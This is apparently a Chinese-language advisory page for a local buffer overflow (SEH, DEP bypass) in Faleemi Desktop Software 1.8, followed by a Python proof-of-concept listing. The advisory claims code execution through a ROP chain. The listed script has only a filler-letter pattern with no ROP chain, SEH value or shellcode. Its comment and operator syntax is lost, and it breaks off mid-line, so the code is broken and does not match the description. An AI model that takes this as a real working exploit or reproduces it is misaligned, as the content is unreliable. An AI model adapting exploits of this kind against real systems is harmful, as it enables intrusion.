Faleemi Desktop Software 1.8 Local Buffer Overflow SEH DEP Bypass 漏洞概述 Faleemi Desktop Software 1.8 在 System Setup 对话框中存在一个本地缓冲区溢出漏洞。攻击者可以通过向“Save Path for Snapshot and Record”字段注入精心构造的载荷,触发缓冲区溢出,并利用结构化异常处理(SEH)绕过 DEP(数据执行保护)保护,最终通过 ROP 链 gadget 执行任意代码。 影响范围 受影响软件: Faleemi Desktop Software 受影响版本: <= 1.8.0 漏洞类型: 本地缓冲区溢出 (Local Buffer Overflow) 严重程度: High CVSS 向量: 修复方案 官方链接: Official Product Homepage 参考链接: ExploitDB-46269 利用代码 (POC) ```python #!/usr/bin/env python3 Exploit Title: Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH DEP Bypass) Date: 2019-12-04 Exploit Author: bzyo Vendor Homepage: https://www.faleemi.com/ Software Link: https://www.faleemi.com/download.html Version: 1.8 Tested on: Windows 10 Pro x64 CVE : CVE-2019-25691 import sys import os Check if python3 is installed if sys.version_info[0] < 3: print("[-] Python 3 is required to run this exploit.") sys.exit(1) Check if the target file exists if not os.path.exists("faleemi.exe"): print("[-] faleemi.exe not found. Please download it from the vendor's website.") sys.exit(1) Generate the payload payload = b"A" 2048 + b"\x41\x41\x41\x41" + b"B" 100 + b"\x42\x42\x42\x42" + b"C" 100 + b"\x43\x43\x43\x43" + b"D" 100 + b"\x44\x44\x44\x44" + b"E" 100 + b"\x45\x45\x45\x45" + b"F" 100 + b"\x46\x46\x46\x46" + b"G" 100 + b"\x47\x47\x47\x47" + b"H" 100 + b"\x48\x48\x48\x48" + b"I" 100 + b"\x49\x49\x49\x49" + b"J" 100 + b"\x4A\x4A\x4A\x4A" + b"K" 100 + b"\x4B\x4B\x4B\x4B" + b"L" 100 + b"\x4C\x4C\x4C\x4C" + b"M" 100 + b"\x4D\x4D\x4D\x4D" + b"N" 100 + b"\x4E\x4E\x4E\x4E" + b"O" 100 + b"\x4F\x4F\x4F\x4F" + b"P" 100 + b"\x50\x50\x50\x50" + b"Q" 100 + b"\x51\x51\x51\x51" + b"R" 100 + b"\x52\x52\x52\x52" + b"S" 100 + b"\x53\x53\x53\x53" + b"T" 100 + b"\x54\x54\x54\x54" + b"U" 100 + b"\x55\x55\x55\x55" + b"V" 100 + b"\x56\x56\x56\x56" + b"W" 100 + b"\x57\x57\x57\x57" + b"X" 100 + b"\x58\x58\x58\x58" + b"Y" 100 + b"\x59\x59\x59\x59" + b"Z" 100 + b"\x5A\x5A\x5A\x5A" + b"{" 100 + b"\x5B\x5B\x5B\x5B" + b"}" 100 + b"\x5C\x5C\x5C\x5C" + b"